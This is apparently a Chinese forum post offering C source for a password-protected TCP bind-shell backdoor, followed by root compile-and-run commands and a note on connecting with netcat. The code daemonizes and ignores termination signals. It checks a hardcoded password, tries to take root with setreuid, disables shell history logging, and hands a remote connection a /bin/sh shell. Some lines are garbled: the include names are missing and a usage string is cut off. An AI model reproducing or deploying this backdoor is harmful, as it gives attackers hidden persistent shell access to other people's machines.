#include
#include
#include
#include
#include
#include
#include
#define backlog 64
#define PASSWORD "password" /*连接的密码*/
main(int argc,char **argv)
{
int listenfd,connectfd,f;
pid_t pid;
struct sockaddr_in server;
struct sockaddr_in client;
u_int sin_size;
char p[1000];
if(argc!=2)
{
printf("./tcps
exit(1);
}
signal(SIGCHLD, SIG_IGN);
signal(SIGHUP, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGINT, SIG_IGN);
if (fork())
exit(0);
listenfd=socket(AF_INET,SOCK_STREAM,0);
if(listenfd==-1)
{
printf("socket fail\n");
exit(1);
}
memset(&server,0,sizeof(server));
server.sin_family=PF_INET;
server.sin_port=htons(atoi(argv[1]));
server.sin_addr.s_addr=htonl(INADDR_ANY);
if(bind(listenfd,(struct sockaddr*)&server,sizeof(server))==-1)
{
printf("bind fail\n");
exit(1);
}
if(listen(listenfd,backlog)==-1)
{
printf("listen fail\n");
exit(1);
}
sin_size=sizeof(client);
connectfd=accept(listenfd,(struct sockaddr *)&client,&sin_size);
while(connectfd)
{
pid=fork();
if (pid>0)
{
close(connectfd);
continue;
}
else if (pid==0)
{
recv(connectfd, p, 1000, 0);
#ifndef REMOTELY_EXPLOITABLE
for (f = 0; f < strlen(p); f++)
switch (p[f])
{
case '|':
case ';':
case '&':
case '>':
case '`':
case '\r':
case '\n':
p[f] = '\0';
break;
}
#endif /* REMOTELY_EXPLOITABLE :P */
if (strncmp(p, PASSWORD,32) != 0)
{
send(connectfd, "fail", 4, 0);
send(connectfd, "\377\373\001", 4, 0);
close(connectfd);
exit(1);
}
printf("connect success");
close(0);
close(1);
close(2);
dup2(connectfd, 0);
dup2(connectfd, 1);
dup2(connectfd, 2);
setreuid(0, 0);
setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.", 1);
unsetenv("HISTFILE");
execl("/bin/sh", "sh", (char *) 0);
close(connectfd);
exit(0);
}
else
{
printf("fork fail.\n");
exit(1);
}
}
close(listenfd);
}
[root@localhost root]# gcc tcps.c
[root@localhost root]# ./a.out 1234
[root@localhost root]#[/code]
然后就可以在windows下用nc连接了
nc -vv ip/域名 后门端口号
输入密码就ok了
不过程序还是有些小毛病。。。。。。。。。。。。。。。。。。。。。。